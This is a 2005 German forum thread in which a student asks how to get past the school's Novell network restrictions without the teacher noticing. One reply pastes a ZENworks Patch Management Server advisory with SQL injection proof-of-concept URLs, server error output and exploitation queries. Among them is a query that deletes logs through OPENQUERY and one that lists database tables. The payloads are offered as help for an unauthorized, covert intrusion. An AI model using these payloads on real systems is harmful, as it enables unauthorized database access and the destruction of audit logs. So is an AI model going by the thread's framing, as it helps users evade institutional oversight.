Wie kann ich in novel knacken??????

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von marsi87, 2. November 2005 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 2. November 2005
    Hab ein problem in meiner Berufsschule ist im in der Textverarbeitung so was von langweilig aber das Internet ist gesperrt wie kann ich aber trotzdem mich ins Internet hacken ohne das mein lehrer es merkt??
     

  3. Anzeige
    Dealz: stark reduzierte Angebote finden.
  4. #2 2. November 2005
    1.) heist es novell
    2.) w00t
    3.)

    Code:
    Summary
ZENworks Suite "automates and enforces business and IT managment processes across the lifecycle of desktops, laptops, servers and handhelds to control costs, ensure security and compliance, optimize the value of IT assets across diverse server and client platforms".

The Novell ZENworks Patch Management Server is vulnerable to SQL injection in the management console.

Credit:
The information has been provided by Dennis Rand.
The original article can be found at: http://www.cirt.dk/advisories/cirt-39-advisory.pdf

Details
Vulnerable Systems:
* Novell ZENworks Patch Management Server version 6.0.0.52

Immune Systems:
* Novell ZENworks Patch Management Server 6.2.2.181 or newer

Proof of Concept:
http://192.168.1.10/computers/default.asp?...irection=';

Response from server: Incorrect syntax near ', @RecsPerPage=100, @FirstRec=0, @Action=0, @Search = ', @groupFilter = '.

http://192.168.1.10/reports/default.asp?sort=[ReportImpact_Name]&Dir=asc &SearchText=';StatusFilter=ERRR &computerFilter=187&impactFilter=29&saveFilter=save&Page=rep

Response from server: Incorrecy syntax near ', @delimiter='.

http://192.168.1.10/reports/default.asp?sort=[ReportImpact_Name]&Dir=asc &SearchText=CIRT.DK &StatusFilter=';&computerFilter=187&impactFilter=29 &saveFilter=save&Page=rep

Response from server: Incorrect syntax near ', @groupFilter = ', @ImpactFilter = '.

http://192.168.1.10/reports/default.asp?sort=[ReportImpact_Name]&Dir=asc &SearchText=CIRT.DK &StatusFilter=ERRR&computerFilter=';&impactFilter=29 &saveFilter=save&Page=rep

Response from server: Line 1: Incorrect syntax near ', @Contact_ID='.

Exploitation examples:
http://192.168.1.10/computers/default.asp?...rection=;select *+from+testclient.master.dbo.sysobjects

http://192.168.1.10/computers/default.asp?...rection=;select *+from+OPENQUERY+(+[testclient],+"select+@@version;+delete+from+logs")

Server 'testclient' is not configured for DATA ACCESS. [2]

http://192.168.1.10/computers/default.asp?...rection=;SELECT name+FROM+sysobjects+WHERE+xtype+=+"U"

http://192.168.1.10/computers/default.asp?...rection=;select *+from+OPENQUERY+(+[testclient],+"select+@@version;+delete+from+logs")

Server 'testclient' is not configured for DATA ACCESS.

Solution:
Upgrade to ZENworks Patch Management version 6.2.2.181 (or newer hot fix via your PLUS server) found at http://download.novell.com.
     
  5. #3 3. November 2005
    aha und geht das auf deutsch auch
     
  6. #4 3. November 2005
    SQL injection <- -> google !
    sicher das es novell is oder suse ?? ist ja jetzt ineinander verschachtelt, was wie und wo sag ich nich *gg* weil ichs nicht mit sicherheit weiss
     
  7. #5 3. November 2005
    kurz gesagt gibt es kein 1 klick lamer tool womit du ein (!) novell ownen kannst..entweder du kennst dichn bissle damit aus oder du lässt des !


    mfg moep
     

  8. Videos zum Thema
Die Seite wird geladen...
Similar Threads - kann novel knacken
  1. moridin

    Habt ihr schon mal investiert? Wie kann man investieren?

    moridin , 9. September 2018 , im Forum: Finanzen & Versicherung
    Antworten:
    17
    Aufrufe:
    6.612
    moridin
    31. Oktober 2018
  2. Carla Columna

    WHO: Spielsucht am Computer als Krankheit anerkannt

    Carla Columna , 19. Juni 2018 , im Forum: PC & Konsolen Spiele
    Antworten:
    1
    Aufrufe:
    3.502
    pattich
    20. Juni 2018
  3. Tommy Weber

    Elektroautos - die unbekannten Wesen

    Tommy Weber , 1. November 2017 , im Forum: Auto & Motorrad
    Antworten:
    4
    Aufrufe:
    14.507
    Painkiller47
    30. November 2018
  4. Anuskapelle

    Kann Speichermedien unter Win 10 nicht auswerfen

    Anuskapelle , 12. September 2017 , im Forum: Windows
    Antworten:
    6
    Aufrufe:
    13.290
    Anuskapelle
    9. Dezember 2017
  5. Eimsbush

    Was kann Novell?

    Eimsbush , 23. Januar 2008 , im Forum: Windows
    Antworten:
    6
    Aufrufe:
    320
    Eimsbush
    24. Januar 2008